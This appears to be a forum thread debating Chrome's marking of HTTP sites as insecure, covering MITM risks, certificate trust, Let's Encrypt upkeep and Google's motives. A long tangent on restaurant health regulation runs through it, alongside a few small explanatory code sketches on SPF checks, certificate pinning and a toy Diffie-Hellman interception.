I've been MITM'd numerous times in the past. I've been MITM'd by corporate networks filtering my traffic. I've been MITM'd by scummy and public wifi hotspots trying to inject ads. My own domain provider once MITM'd my domain in a weird attempt to tell me my domain was expiring...
I'm not trying to protect myself from a targeted attack. I'm trying to protect myself from the enormous amount of scummy behavior in this whole industry. When I connect to my bank, I want my data to be secure not only against malicious activity, but negligence and incompetence. This is the threat model that HTTPS-Everywhere protects against.
Sure, people get bitten by viruses and phishes. But let's fix things one step at a time.
> When I connect to my bank, I want my data to be secure not only against malicious activity, but negligence and incompetence.
What bank do you use that doesn't use https already? Maybe it's time to change your bank rather than force every website in the world to switch to https.
Of course my office pushes a root certificate to all the devices and Skype for Business breaks unless you’ve trusted that certificate to handle SSL traffic.
> It's not important at all for most people. How many times have you been MITM'd? I'll tell you about me: zero.
How do you know? What is your groundless, evidence-free assertion worth to you?
> Nobody cares enough about me to do that.
I have detected Firesheeping on coffee shop networks in the past. Guess somebody cared about all the people in there, huh?
The conflation of Google using information collected about you in aggregate to provide advertising services and man-in-the-middle attacks on clients is dishonest, disingenuous, and at this point downright malicious. Stop.
Are you proposing that Chrome drop the security warning if it detects that the user is visiting a site that only has cat videos or blog posts on? Do you realise that people have been arrested for writing blog posts?
You may be lacking SPF, DKIM or DMARC records. The lack of these records is a very reliable way to detect spambots that forge the From: field, so many mail hosts now treat messages without them as spam by default.
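To make the SPF part concrete, here is a minimal sketch of how a receiving mail server can evaluate an SPF TXT record against a sender's IP. This is deliberately simplified (only `ip4:`/`ip6:` mechanisms with a final `-all`; real SPF per RFC 7208 also has `include:`, `a`, `mx`, qualifiers, and macro expansion), and the record shown is a hypothetical example:

```python
import ipaddress

def spf_allows(record: str, sender_ip: str) -> bool:
    """Very simplified SPF check: only ip4:/ip6: mechanisms, falling
    through to an implied -all (reject) at the end."""
    ip = ipaddress.ip_address(sender_ip)
    for mech in record.split():
        if mech.startswith(("ip4:", "ip6:")):
            network = ipaddress.ip_network(mech.split(":", 1)[1], strict=False)
            if ip in network:  # mismatched IP versions simply don't match
                return True
    return False  # no mechanism matched: treat as -all

record = "v=spf1 ip4:192.0.2.0/24 -all"   # hypothetical published record
print(spf_allows(record, "192.0.2.17"))   # True  (inside the allowed range)
print(spf_allows(record, "198.51.100.9")) # False (would be rejected/flagged)
```

The point of the sketch is just the mechanism: the receiver looks up the TXT record for the domain in the From/envelope sender and checks whether the connecting IP is on the published list; mail from anywhere else gets treated as forged.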
I do agree with you - it is appalling how much power Google has. I think a bit of perspective is helpful, though.
There hasn't really been much of a span where there wasn't a de facto 900 Lb gorilla browser that threw its weight around. I think a lot of us watched this happen, but the various charts on this page are instructive:
It appears that somehow the browser market trends toward an unstable near-monopoly of sorts, at least so far.
So, meet the new boss, same as the old boss. At least https everywhere is a long-term public good that they're willing to take grief over forcing. It beats some of the other unilateral changes various once-dominant browsers forced.
The complexity of the web platform is at least partly to blame for this. The specifications for HTTP, HTML, DOM, CSS, JavaScript together are gargantuan and growing even further every year. This makes the development of Chrome's new competitors and the maintenance of already existing browsers extremely expensive, and it also hinders cross-browser compatibility of web applications as every browser fails to implement the monstrous specs flawlessly in its own unique ways.
We are luckier than we deserve that Mozilla exists. If it was necessary to re-implement a modern Web browser completely from scratch today, it would probably take someone with the level of commitment of Richard Stallman to make it happen.
Search engines and browser vendors have had a big influence on configuration, layout, mobile friendliness and other things long before HTTPS All The Things started to gain traction.
It's not random, and that it might also serve security is a side effect.
It is about competitive advantage over other Ad Networks which might not implement HTTPS for AdSense. It is about raising both monetary and technical cost of server setup to make Google Cloud offer look even cheaper. It is very self serving.
Probably the dozens of various DNS, DKIM, SPF, SMTP behavior config, non-consumer-IP, etc., etc. boxes that must be ticked just right in order to not be considered a spammer these days. It's very difficult to get it all correct enough to keep a significant portion of the email sent through your SMTP site from being considered spam by mainstream email providers such as Google.
I can confirm that this is a giant pain in the ass. I use a non-standard address scheme (instead of the plus character as a tagged-address delimiter, I use the qmail approach, a dash character), so I can't easily move my domain to GMail. I occasionally end up in spam folders for reasons I can't discern, despite years of puzzling and discussion with a number of experts.
The especially frustrating thing is that there's no way to find out why you've been binned. Even my friends who work at Google can't find out for me, much less get me whitelisted.
It's very difficult to get it all correct enough to keep a significant portion of the email sent through your SMTP site from being considered spam by mainstream email providers such as Google.
This doesn't change the problems of unreliable email because mail services are too aggressive, unfortunately.
We recently got a bounced mail (not dumped in a spam folder, actively rejected) from a major university, telling us that the message looked like unsolicited bulk mail. The message was sent directly to a specific single customer in response to a purchase they had just made, contained information that we were required by law to provide to them, and was sent from a reputable host with things like SPF properly set up. That is simply broken, and it is 100% the fault of the mail service admins at the university.
If it was just the occasional small site it would not be such a problem, but even iCloud (Apple) and Outlook (Microsoft) get it wrong with some regularity from hosts that check all the right boxes.
Required maintenance for a simple, static http site: none.
Required maintenance for a simple, static https site: configure let’s encrypt and keep the cron job running.
Big difference? Not for some, but it sure is something that offers very little value for very many site owners. Even the top 100 sites are only at 80% https by default, and they do it for a living!
>it sure is something that offers very little value for very many site owners.
Because it's not meant to offer value for a site owner, it's meant to offer value to the user.
When I type a password on your website, I'm the one that has the most to lose there. When I type my credit card or other personal information into a site, I'm the one that will need to spend time and money getting control of my information if it was stolen.
When I am browsing the web and ads are being injected into the HTTP request, or my ISP is dragnet datamining, or a compromised router is injecting malware into every page, I'm the one that loses, not you.
The argument that an insecure website is easier to maintain than a secure website is like saying "a car without airbags is easier to work on". The vast majority don't care about how easy it is to maintain the site; they care about their privacy and security.
And your counterpoint is needing to download and run some open-source software once a month (or automate the process and never touch it again). A few years ago that would have been a much larger list, but developers were listening to the complaints, and realized that the only way to a fully secure web was to make this process easier, so they did!
It's easier than ever to enable HTTPS on every website, and in the vast majority of cases it's a net improvement for users.
I think you misunderstand. An ad-free website served over HTTP can (and does) have ads injected into it by someone along the way. And not just ads, but malware as well.
And privacy of information going from your browser to the internet is only half of the equation. What about privacy about what you are viewing?
I don't want every single router between my computer and the server knowing the full contents of the pages I'm choosing to view, or building advertising profiles on my habits, or even knowing what device type, browser, OS, and more I'm using.
Would a self-signed (I'm not sure this is the right terminology) cert be sufficient for this?
That way if someone MITM'd you, you would see that the cert changed, right?
But I guess if the path you use to the website is always the same, then if they MITM'd you the first time you accessed it, you wouldn't be able to tell?
Hmm, I guess that probably isn't enough then.
Is there really no good way to serve public information from a website that doesn't require periodically updating one's cert, and without risking MITM'ers changing the content?
I guess if the client already has the hash of the content, but that isn't very convenient.
The problem with self-signed certs is that you're then given no assurance that you're not being MITMed. An attacker could be stripping the real SSL off a connection, re-encrypting it with a self-signed cert they've created, and then showing that to you. Real SSL certificates have trust chains, which aren't used in self-signed certs.
Let's Encrypt has to use one of the Ten Blessed Methods to validate control over the name they issue for. Unlike a random person out on the Internet, doing that validation is their actual job, so they're pretty good at it, and the Ten Blessed Methods tell them what constitutes an acceptable means of doing so.
These days Let's Encrypt uses a "multiple view" approach in which more than one physical location in the world hosts Let's Encrypt systems (although only their US West Coast location contains the actual CA) and so they can check that things appear the same from more than one angle, you can't just take over the ISP they're getting service from in California and leverage that to get anything you want. If the views don't agree (e.g. you pass a Let's Encrypt validation from Paris but not from San Francisco) then your application is denied automatically.
Now, the next layer above is also interesting. Who checks that Let's Encrypt and other public CAs are doing their job? Fortunately Mozilla is on the case again. All major trust stores say they enforce the Baseline Requirements, which explain how a CA should do its job, but all except one make decisions entirely in private. Or maybe they just bin all the complaints if the CA pays them a bribe? Who knows. Mozilla acts openly in public, and you can help oversee the Web PKI in their m.d.s.policy group (please do -- your insight might be valuable).
Assuming cert pinning is saving the information from the first time it is accessed, that is sort-of what I was imagining for part of what I was saying.
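The trust-on-first-use idea being described here is easy to sketch: remember a fingerprint of the DER-encoded certificate the first time you see a host, and flag any later change. The host name and byte strings below are placeholders, and a real client would of course hash actual certificates obtained from the TLS handshake:

```python
import hashlib

# Toy trust-on-first-use (TOFU) pin store, like SSH's known_hosts:
# pin the SHA-256 fingerprint of the certificate on first contact.
pins: dict[str, str] = {}

def check_pin(host: str, der_cert: bytes) -> bool:
    fp = hashlib.sha256(der_cert).hexdigest()
    if host not in pins:
        pins[host] = fp          # first visit: trust and remember
        return True
    return pins[host] == fp      # later visits: must match the stored pin

first = b"...DER bytes of the original certificate..."   # placeholder
forged = b"...DER bytes of an attacker's certificate..." # placeholder
print(check_pin("router.local", first))   # True  (pinned on first use)
print(check_pin("router.local", first))   # True  (unchanged)
print(check_pin("router.local", forged))  # False (certificate changed!)
```

This captures both halves of the thread's point: a changed cert is detected on every visit after the first, but if the very first connection was already MITM'd, the attacker's cert is what gets pinned.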
True. But why should the website owner do something about it? It's a crappy network the user is using. The same crappy network could strip https and then inject ads.
No, a properly set-up site cannot have its HTTPS stripped, and even if it could, it is the browser's job to warn the user that the site they are on is insecure, regardless of why it is that way.
Problem is that browser warnings are sometimes false. Self signed certificates are not unsecure, the underlying encryption is still the same. The "unsecure" only applies to the CA, but that is not clear in the warning.
>Problem is that browser warnings are sometimes false. Self signed certificates are not unsafe, the underlying encryption is still the same.
Browser warnings aren't false; your reading of them is false. Read around on badssl.com [0]. The self-signed warnings in Chrome say:
>Attackers might be trying to steal your information from self-signed.badssl.com (for example, passwords, messages, or credit cards).
And when you click advanced chrome says:
>This server could not prove that it is self-signed.badssl.com; its security certificate is not trusted by your computer's operating system. This may be caused by a misconfiguration or an attacker intercepting your connection.
It says nothing about the encryption being bad, I don't know where you got that from. What it does say is that Chrome has no way to validate that the site you are going to is actually the site in the address bar. Encryption is pointless if anyone and everyone knows the password (oversimplified, but you get the point). Encryption without Authentication is as secure as normal HTTP.
Because of the term "unsecure".
Also Chrome says "This is not a secure connection". Emphasis on "connection". Which implies encryption (on that connection) being not secure. Which is wrong. What happens on the site itself is a layer above.
>Which implies encryption (on that connection) being not secure. Which is wrong.
No it is not wrong, even your confusingly worded sentence there is still fully correct.
Security (or encryption, or any other synonym you can come up with here) is made up of 3 (well technically 4) parts:
* confidentiality
* integrity
* authenticity
* (and technically non-repudiation, but that doesn't really apply here)
Self-signed HTTPS certificates provide only 2 of the 3 (confidentiality and integrity), and it's the last one (authenticity) that is most important, because without it you don't know who you are talking to. It could be your website, or it could be some asshole down the street pretending to be your website; you have literally no idea.
You say it's misleading, but it is you that is misreading and misunderstanding the concepts. Encryption without authentication is like encryption without a password. Utterly pointless.
The browser is implying that AES on that connection is unsecure. A better wording would be "might be unsecure". Because even if it's self signed, there is a possibility it's still the correct certificate.
Yes, because AES in that configuration IS INSECURE!
Just like my analogy, AES encryption with a password of nothing is "unsecure", and no matter how much you try to argue that it's still perfectly secure, you are wrong.
Just like this, the AES is pointless when ANYONE can set the password (or in more correct terms, when anyone can create one with the user in a DHKE). If you can't tell that the server you are talking to is actually the server you meant, then AES does fuckall, because the man-in-the-middle is the one that is setting the password!
You are doing the equivalent of telling me how secure your new house door lock is, while wiring it up to always unlock when someone rings the doorbell... All the security in the world won't help you when you give everyone a way to bypass it instantly.
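The "anyone can set the password" point above can be shown concretely with a toy unauthenticated Diffie-Hellman exchange (tiny insecure parameters, illustration only): because neither side can verify who they negotiated with, Mallory simply runs two separate exchanges and ends up sharing a key with each victim.

```python
import random

# Toy DH parameters -- far too small for real use, illustration only.
p, g = 23, 5

def dh_pair():
    """Generate a (private, public) DH pair: pub = g^priv mod p."""
    priv = random.randrange(2, p - 1)
    return priv, pow(g, priv, p)

a_priv, a_pub = dh_pair()   # Alice
b_priv, b_pub = dh_pair()   # Bob
m_priv, m_pub = dh_pair()   # Mallory, sitting in the middle

# Mallory intercepts both public values and substitutes her own,
# so each victim unknowingly completes the exchange with Mallory.
alice_key = pow(m_pub, a_priv, p)        # Alice "shares" this with "Bob"
bob_key = pow(m_pub, b_priv, p)          # Bob "shares" this with "Alice"
mallory_with_alice = pow(a_pub, m_priv, p)
mallory_with_bob = pow(b_pub, m_priv, p)

assert alice_key == mallory_with_alice   # Mallory can decrypt Alice's traffic
assert bob_key == mallory_with_bob       # ...and Bob's, re-encrypting between
```

The encryption on each leg is "working" perfectly; it's the missing authentication (which in TLS is supplied by the certificate chain) that lets Mallory read everything.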
Only if you verify that it is the same cert before you visit the page.
Luckily browsers will show you the warning saying that page is insecure, and give you the option of going there anyway after you have validated that the cert is the same.
But it's not only if you use a shitty ISP. It's if any hop between you and the server is being shitty. And only 1 or 2 of those can you control as the user.
Having spent four months in a hospital, it isn't just "ISPs" who are the problem.
Rather than the hospital supplying any kind of proper authentication, they MITM'd the first connection to their WiFi and logged your IP address as your user. They also required you to refresh that connection every half hour or so.
There are a lot of people doing things in really bad ways.
We can't fix all of them, and often we don't have a choice about interacting with them.
Required maintenance for a simple, static https site: Install certbot, press enter a few times, forget about it.
"keep a cron job running" sounds like it you're running the cron job by hand.
>Even the top 100 sites are only at 80% https by default, and they do it for a living!
That's entirely separate from your "simple, static site" example, and yes, rolling any sort of large change out to a big site is a big deal, and if there isn't business motivation to do it, it likely won't happen. Google is providing everyone a business motivation by threatening to point out to users that insecure sites are insecure.
> "keep a cron job running" sounds like it you're running the cron job by hand.
Cron jobs fail sometimes. You have to monitor them, investigate why they failed, fix the issue, and rerun them.
Web servers fail, too, but with shared hosting, it's mostly not your problem. And shared hosting providers are still trying to charge an arm and a leg to manage SSL certs for you (because it's a nice high-margin business for them).
And spying/surveillance/analytics/snooping. That's not minimal. And you get all those benefits from checking a checkbox in cPanel and the rest is handled automatically? Who could be against that?!
There's shenanigans like "grnail.com" pretending to be "gmail.com", which bigger and much more expensive certs are supposed to protect against. But the benefit of HTTPS, even where it doesn't prevent this, is still very high.
1. You don't have to monitor your cronjobs. They'll send you an email when they produce output.
2. Let's Encrypt will send you an email if your certificate is going to expire in a month. This will normally never happen, since it is continuously renewed.
> 1. You don't have to monitor your cronjobs. They'll send you an email when they produce output.
You now have to configure e-mail on your small server to actually work (and not get immediately eaten by spam filters of your personal e-mail provider).
If you have a simple static site, you can have Google's Firebase hosting thing do the HTTPS for you, without management, for free. Netlify[1] is another one I see recommended around here decently often which has the same service.
If you are running your own webserver even a static simple site has required maintenance. You need to keep the server and OS patched. So adding a letsencrypt cron job is not any worse than configuring something like Debian's unattended-upgrades.
But I don't think most site owners should be doing even that much. They should just pay for static hosting, which is cheap and ensures somebody else will keep the server, os, and cert all safe.
I added https to my static site last year and it has been a huge waste of time.
ubuntu + nginx worked fine for years without much maintenance, but I've spent so much time reconfiguring things when something breaks (and it is really clear when a renewal fails... thanks, HSTS).
Things that used to be simple, like setting up a subdomain (need to get a new cert and reconfigure the cron job now) or pointing at a websocket (can't point directly at node since that's not secure, it needs to pass through nginx now), consistently take hours to do now.
I mostly do data analysis and front end work; mucking around in nginx config files is something I would have been happy never experiencing. It sucks that it's harder to host your own website now.
I have nginx fronting around 15 different (very low traffic) websites (most static, a few python), all of which have Let's Encrypt certs. The required additions to the nginx conf were minimal and easy. Adding a new subdomain is trivial. Fetching the initial certificate from Let's Encrypt is a short, easy command line. And "sudo certbot renew; sudo /etc/init.d/nginx reload" in a cron job keeps the certs up to date (the "renew" command is smart enough to go through the list of certs you have and renew them all).
It's really hard to imagine it getting much easier.
You don't actually need to keep web servers serving static content patched. Simply close all other ports, run a minimal web server, and it's a tiny attack surface. Some of these have made it 20+ years with zero maintenance.
I use cloudflare for my static website so that https is seen by the browser even though I am serving http.
Advantages are that it is free and zero maintenance, however nation or network providers can intercept between cloudflare POP and my server. I'm ok with that for my situation.
As a website visitor this has always bothered me. HTTPS used to mean that I had an encrypted path between my browser and the server actually serving the webpage. With Cloudflare allowing this weird hybrid mode, I can never actually know if the connection is secured all the way end to end.
Cloudflare didn’t invent this or make it normal. It’s always been common to terminate HTTPS in front of your “actual” server and then re-encrypt to the “actual” server, or (very commonly)... not.
Cloudflare may have made it more common for the most basic kind of site (with their easy setup and free tier) but at the same time most of those sites probably didn’t use https anyway.
The reasons this has been done are: performance (specialized hardware / separation of concerns); load balancers/firewalls needing to decrypt in order to route or enforce policy (that doesn’t need to imply termination, but it often goes hand-in-hand); and protecting keys from your app server (think of it as like an HSM: if your app server gets compromised, you probably don’t want the TLS private key to be leaked. Again, you could re-encrypt with a different key, but often this hasn’t been done.)
The threats for last mile network fuckery (e.g. consumer ISP) are quite different than those on the backend. Google has to worry about nation states messing with their networks, and so they’ve had to reengineer end-to-end encryption within their network. As an end-user you just sort of need to accept that this isn’t within your ability to control or know.
Sure, but the GP made a much stronger claim: that they previously knew that it was the “actual” server terminating HTTPS.
Even still, the difference between this and e2e encryption isn’t something an end user is really equipped to evaluate, IMO. The threat model is practically different vs. no encryption at all.
Cloudflare also supports re-encryption over the net, which is useful if your hosting provider supports HTTPS but not via a custom domain (e.g. Google Cloud's GCS, their S3 equivalent).
No, I didn't make that stronger claim; if that's what it sounded like, I apologize for the poor wording. I was definitely assuming "terminate TLS at load balancer and proxy in the clear over internal, private network" as a common, long-established practice that I have no problem with.
With services like Cloudflare, you can terminate TLS at CF, and then proxy over the public internet to the server that actually serves the page, which I think defeats a lot of the purpose of TLS, and I can never know ahead of time when I request a page of HTTPS if this will in fact be what's happening.
If you truly have a simple, static site, the required maintenance should most of the time be exactly the same: pay your hosting provider, nowadays they should be providing HTTPS.
Then yes, you pay the maintenance overhead for doing so. I do it too, since I want to mess with these things and run things I can't easily run on shared hosting and if I'm taking care of a server and HTTPS for it anyways adding another site isn't much effort, but for just a static site it's overkill most of the time and kind of "your own fault" if you make it harder on you than it is.
That said, using certbot made it so painless I just started doing it at some point for everything I run and I only once had a small hiccup configuring a renewal-hook.
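For anyone hitting the same hiccup: the hook typically ends up recorded in the per-domain renewal config that certbot maintains, so it runs automatically after each successful renewal. A sketch of what that looks like (the domain and the reload command here are hypothetical; adjust for your own setup):

```ini
# /etc/letsencrypt/renewal/example.com.conf -- maintained by certbot.
# The hook below runs after each successful renewal of this cert,
# so the web server actually picks up the new certificate.
[renewalparams]
renew_hook = systemctl reload nginx
```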
The English government (well, they're the British government, but they don't get to set building rules for the bits of Britain that aren't England) didn't think fire sprinklers were necessary in big tower blocks and schools. Too many regulations you know, it hurts the economy.
Then not just one but two huge tower blocks in London burned down. So how about that, suddenly maybe tower blocks _did_ need sprinklers after all. Shame about all the dead people.
Then use a provider that makes it easy. My point wasn't that it's easy everywhere, just that for simple static sites you can just use a provider that makes it easy for you.
A small static site I operate recently got HTTPS with zero action on my part. My hosting provider just did it on their own initiative and notified me that it was done. I suppose they're going to do whatever ongoing maintenance it requires.
How do I run that cronjob on a simple, static site? I very deliberately create static sites and store them on e.g. s3 to be served without any effort on my part. I do not want to have to run a 24/7 server just for a monthly cronjob!
>I'm glad this is happening, although I'm more excited for the day when they start very obviously marking password input fields as "NOT SECURE" when they are used on HTTP sites.
Maybe Chrome would be up for it at some point in the future as HTTP form submissions become rarer, though I don't know how they made this decision.
Edit: Amusingly, even though I normally use Firefox, I haven't noticed this UI element recently because I'm so conscious of HTTPS—working on Let's Encrypt and support for it—that I rarely even try to enter information into a non-HTTPS site in the first place. :-) (so I might not be quite the target audience for this notification)
> I never would have imagined that end-to-end encryption by default would be considered "controversial"
The whole point of Google's https crusade is to secure users from ISPs profiling their browsing activity, which for them is about eliminating the competition because they still monitor and track everyone and so if they knock the ISPs out they solidify their monopoly position.
HTTPS is not bad but Google's motives (in the context of their business model and monopoly position) are and that gives some people pause.
> The whole point of Google's https crusade is to secure users from ISPs profiling their browsing activity, which for them is about eliminating the competition because they still monitor and track everyone and so if they knock the ISPs out they solidify their monopoly position.
Even if that's Google's motivation, I'm OK with the end result. I already use a VPN on my iPhone when on LTE because Verizon's been caught sniffing and manipulating traffic a few too many times. At least I can (and generally do) opt out of using Google's services, so I genuinely appreciate them helping me opt out of Verizon's unwelcome inspections.
Wow, I'm genuinely surprised someone managed to spin something like Google advocating for a secure web into a monopoly agenda. I get it, corporations are evil. But not every move. Why can't this simply be something out of goodwill?
I don't think this needs to be seen as a monopoly move. Think of it instead like health inspections for restaurants.
In theory, restaurateurs would hate health inspections, because they're intrusive regulation with no direct benefit. But they have a lot of indirect benefit, in that the safer people feel going to restaurants, the more likely they are to go out to eat.
Similarly, the safer the web is, the better off Google is, because people do more things on the web. That does benefit them, sure, but I don't think it benefits them disproportionately, let alone harms other legitimate competitors.
Source on people eating out more when there are health inspections? I've lived in and traveled to many countries where there are no meaningful food inspections whatsoever, and your statement really does not pass the sniff test. And as an aside, there also tend to be far more independent restaurants, since if you can cook something well, all you need do is plop out a table, put up a sign, and you're in business.
I think a cross-country comparison clouds the issue. Think of it this way: if in an American city people started to frequently get sick from poor restaurant hygiene, would you expect them to eat out more, less, or the same? Would you expect them to be more or less willing to try restaurants new to them? My strong bet is on less for both, because people are pretty risk-averse when it comes to vomiting.
This is an interesting conversation to have, as I used to feel very similarly, until I got to experience a nation with really no rules or regulations on food at all. It's actually what started reshaping my view of regulations in general. Think about the implication of your statement/belief: you're implying that the primary reason restaurants aren't making people sick, en masse, is rules and regulations.
The restaurant industry is one place where self regulation works surprisingly well. Think about your own experience, as it's true for just about everybody. When you choose to go out, you most often go to one of a handful of the same restaurants. What happens if you get sick at a place? You're probably not going back there. And you're also probably going to tell your friends. If you're particularly upset you might even post some less than friendly reviews of the restaurant. That restaurant, with one mistake, converts a high value customer into a one man image destruction machine. And now let's imagine it wasn't a one-off, but this restaurant actually makes a significant number of people sick, even if only on a single day. They're pretty much dead.
All the rules and regulations make it much harder for people to start new restaurants. In most states you're looking at several permits and associated educational courses just to be able to even call yourself a restaurant. And then don't forget to factor in the fees for the permits, the fees for the classes, and plenty of more fees on top of that. Basically you end up having to pay the government a whole lot of money just to be able to sell the food you've probably already been making for your friends and family for years if not decades.
And this leads to utterly ridiculous scenes like this [1]. How dare a man try to sell some hotdogs without asking the government for permission. Time to take all the money out of his wallet, fine him, and probably schedule a court date too. By contrast, you can be completely certain that 100% of McDonald's franchises have every single government fee and permit covered inside out. But that does little to stop people ending up with their food being mishandled, and in some cases intentionally. The big thing you'll see in industries with heavy regulation is a trend towards centralization. Here [2] are some actual data on this 'golden age of restaurants', though the ridiculous number of chains itself is more indicative of the issue than a recent slump.
I too have lived in the third world. But I also have cooked in a commercial setting for immune-compromised people, where I found health department guidelines enormously valuable.
> You're implying that the primary reason restaurants aren't making people sick, en masse, is because of rules and regulations.
No. The primary reason restaurants aren't making people sick is good hygiene all along the food supply chain. But good hygiene isn't easy. It gets harder the more industrial your operation gets. And short-term financial incentives cut against it, especially when you're working at scale.
I will happily eat from one of the probably-unlicensed hot dog carts in my neighborhood because a) I can inspect their kitchen, b) I see them around and so can know who's got a track record, c) I can see who's moving a lot of product, and d) they just can't carry a lot of inventory.
But I won't be nearly as casual with restaurants, because there is so much more opportunity for poor hygiene to impact food. Happily, I live in San Francisco, a city with vigorous restaurant inspection, one where the scores are posted physically in every restaurant. Here, I'll try new restaurants at the drop of a hat, because I'm not worried about shitting my guts out, something that happened to me repeatedly in my third-world eating adventures. My folks, who lived in Mexico for many years, had a complicated set of heuristics around where to go and what dishes were most likely to be safe. Nobody in SF does that.
Your theory is that this is terrible for restaurateurs trying to do new things, but San Francisco is one of the best food cities in the world, with new, bold things opening frequently and often doing quite well. Unregulated sanitation strongly advantages chains, because people know they're getting a safe product. Strongly regulated sanitation enables entrepreneurs, because it removes safety from consideration when looking at a new restaurant.
People opening restaurants here complain about many barriers, but I've never heard one grumble about health code regulation. It's mostly what good cooks do anyhow, so they're happy to be held to a high standard, especially if it disadvantages competitors who would otherwise be cutting corners.
You're putting your head in the sand here. Independent restaurants in the US are dying. This is not based on anecdotal evidence, but national data. And your entire hypothesis that chains thrive on a lack of regulations is similarly completely unsupported by data. Look at the ratios of chains to independent restaurants in countries with extensive rules and regulations on food, then compare that to countries without. If your hypothesis were correct, we'd see domination by chains in countries with minimal rules and regulations; instead it's unambiguously the exact opposite.
Arguably the biggest issue with the regulations is that they're overreaching and extensive to the point that if somebody wants to find a violation, they probably can. And many have very little positive effect. In California the 'CalCode' [1] for food regulations alone is 188 pages of random rules, which regularly change. And that is not an all inclusive document. It regularly references not only itself but also other sources. If you actually put all the rules in their verbose and clear form together, it would likely exceed a thousand pages. And you get these dense rules like:
"FOOD prepackaged in a FOOD FACILITY shall bear a label that complies with the labeling requirements prescribed by the Sherman Food, Drug, and Cosmetic Law (Part 5 (commencing with Section 109875)), 21 C.F.R. 101-Food Labeling, 9 C.F.R. 317-Labeling, Marking Devices, and Containers, and 9 C.F.R. 381-Subpart N Labeling and Containers, and as specified under Sections 114039 and 114039.1. [...Skipping several more lines of rules, just for this single rule...] Except as exempted in the Federal Food, Drug, and Cosmetic Act Section 403(Q)(3)-(5) (21 U.S.C. Sec. 343(q)(3)-(5), incl.), nutrition labeling as specified in 21 C.F.R. 101-Food Labeling and 9 C.F.R. 317 Subpart B Nutrition Labeling."
And that's just one segment of the regulations. If by some miracle you manage to obey every single rule in the CalCode to the letter, there are then hundreds of other pages of rules and regulations you need to obey. And as mentioned, many of these things are completely arbitrary. How deep a sink do you think you need to wash the utensils in a food cart? Would 9 inches do? Obviously that'd be way more than enough, yet that'd be a violation of CalCode, giving them sufficient cause to fine and/or shut down your business. Some politician somewhere at some time decided all sinks must be at least 10 inches deep. Why? No good reason. Instead of creating common sense regulation, rules and regulations inevitably converge on these obtuse rules. Instead it could be that all utensils and instruments used in food preparation need to be able to be fully cleaned on site. But that'd be too logical.
This is all an enormous burden on individuals starting businesses and serves little purpose other than ensuring we're left with chains and perhaps your 'bold' restaurants, which I assume boils down to a euphemism for overpriced outlets primarily targeting yuppies. It's much easier to afford the full size legal team necessary to navigate all this mess when you have a 4 figure markup on your product!
Fundamentally, I think you're just making a lot of this up to suit your ideological views.
For example: "Would 9 inches do? Obviously that'd be way more than enough, yet that'd be a violation of CalCode giving them sufficient cause to fine and/or shut down your business. Some politician somewhere at some time decided all sinks must be at least 10 inches deep. Why? No good reason"
Do you have any data demonstrating this sink issue? I'm betting no. Having cooked commercially, though, I can tell you a deep sink is absolutely necessary to clean well. Is the numeric measurement possibly a little arbitrary? Sure. Most are, but that's better than just "have a pretty deep sink", because you want to install that sink once. You don't want to rip it out later when an inspector says, "Not deep enough, try again."
The people I've met who work on regulatory issues are smart, sincere, and often really want to make things work for users. That's especially true for business regulation, as business owners have the political clout to complain.
I note also that you're energetically conflating restaurants, prepackaged food facilities, and food trucks. Those are all pretty different businesses.
Another example: "This is all an enormous burden on individuals starting businesses"
I doubt it. I know people who have started restaurants, catering companies, and a premade food company. None of them has ever mentioned this as a particularly big burden. They complain about all sorts of other things: staff, customers, competitors, and definitely prices from suppliers and landlords. Never one grumble about safety regulations.
As an aside, the reason that many regulations don't seem "common sense" is generally that some asshole found a way to do something bothersome, so they had to add another regulation. For example, in LA people started to effectively run dodgy used-car lots out of public parking on major streets, inconveniencing both people who wanted to park and merchants who wanted customers to park. Last I heard they were looking at a variety of regulatory solutions, none of which would seem "common sense" unless you know the problem. It's the same deal with building codes; many regulations don't make sense until an expert tells you what's up.
And the same applies with software, really. Look at all the things people have to do to make secure software. Many of the rules make no sense unless you have an attacker in mind.
So given that your basic take seems to be, "I, an internet random, think some regulations I know nothing about are dumb," I guess my answer is, "Ok, buddy. Thanks for sharing."
They just engaged in an action that substantially increases their monopoly over access to user information, which is their golden goose. And this action is going to result in some degree of backlash. People hosting information-only static sites aren't going to be thrilled that Google is effectively coercing them into, at the minimum, setting up Let's Encrypt when they have no reason to do so. And of course, this can be seen through some lens as benefiting the public good. Do you really think Occam's Razor points to the second reason as the primary incentive?
Another example from Google would be them preventing you from running plugins on Chrome that were not from the Google store. Yeah, it can be spun as protecting users from malicious plugins, but it also enhances their control over their users. Incidentally, they decided to ban evil things like Youtube Downloaders from their store as well, which is far more impactful given their increased level of control 'for your safety.'
> google started Calico because you can't show ads to dead people
good one.
I am not sure why people view it as cynical to assume that for-profit corporations act out of self interest.
Have you ever gotten a company you worked for to authorize spending for something where you didn't justify it in terms of its benefit to the company? Was it millions of dollars like Google has spent on this HTTPS thing?
To assume that Google is not doing this for profit would be to assume that they are incompetent or derelict in their professional duties, and that seems unlikely to me in this case.
"Have you ever gotten a company you worked for to authorize spending for something where you didn't justify it in terms of its benefit to the company?"
Yes, actually, and i was managing enough people that it was a dent (i.e. an xx-million-a-year investment in people alone). That company was, in fact, Google.
"Was it millions of dollars like Google has spent on this HTTPS thing?"
Yes.
"To assume that Google is not doing this for profit would be to assume that they are incompetent or derelict in their professional duties, and that seems unlikely to me in this case."
I'm going to disagree with you based on my experience above :)
Can you explain how you spent millions of dollars on something that had no benefit whatsoever for your company?
Now, you may have done something that had more ephemeral benefits and did not have directly attributable immediate revenue impacts, but I am pretty sure that it benefited your company somehow, and I am pretty sure that you justified the expense in terms of the benefit to your company.
If I am wrong I would be interested to hear the details of this.
"Can you explain how you spent millions of dollars on something that had no benefit whatsoever for your company?"
In what sense? Like why they let me do it? Because they aren't as profit driven as you seem to believe. I'm sure parts are, but not the part i was in. Additionally, the founders and CEO definitely cared more about doing the right thing than trying to eke out another little bit of profit for something.
Unfortunately, it's not public in the particular case i'm referring to, so in that case, you'd just have to trust me.
I have also managed similarly not-profit driven things, that are public, like election information publication (which was also xx million worth of people). This data and work was explicitly kept away from any profit driven part of the company, and not driven, at any level, by a desire to profit (In this case, eric thought we should do it, as did sergey, and they very much wanted it to be done because it was the right thing to do, and didn't want us to care one whit about either the business or goodwill aspects)
I'm sure you will contrive a motive.
But you can contrive all you want, it's basically "your random thoughts" against "the people who actually funded and supported it", and i trust them at their words.
"Now, you may have done something that had more ephemeral benefits and did not have directly attributable immediate revenue impacts, but I am pretty sure that it benefited your company somehow, and I am pretty sure that you justified the expense in terms of the benefit to your company."
